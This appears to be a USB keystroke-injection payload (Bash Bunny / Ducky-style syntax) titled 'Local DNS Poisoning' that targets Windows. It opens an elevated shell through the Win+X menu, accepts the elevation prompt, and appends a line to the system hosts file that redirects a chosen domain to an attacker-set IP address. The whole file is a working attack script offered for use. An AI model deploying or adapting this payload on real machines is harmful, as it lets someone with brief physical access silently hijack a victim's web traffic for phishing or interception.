#Title: Local DNS Poisoning
#Description: Attacks the host file to redirect a website of your chosing for a given domain
#Author: DavidSpek
#Props: ashbreeze96 and overwraith
#Target: Windows (Including 10 latest build) 


LED R 200

ATTACKMODE HID
LED STAGE1
Q GUI x
Q DELAY 50
Q A
Q DELAY 500
Q LEFTARROW
Q DELAY 50
Q ENTER
Q DELAY 100
Q STRING set file="%windir%\System32\drivers\etc\hosts"
Q DELAY 50
Q ENTER
Q STRING 'echo 10.1.1.0 test.com>>%file%'
Q DELAY 50
Q ENTER
Q STRING exit
Q ENTER

LED FINISH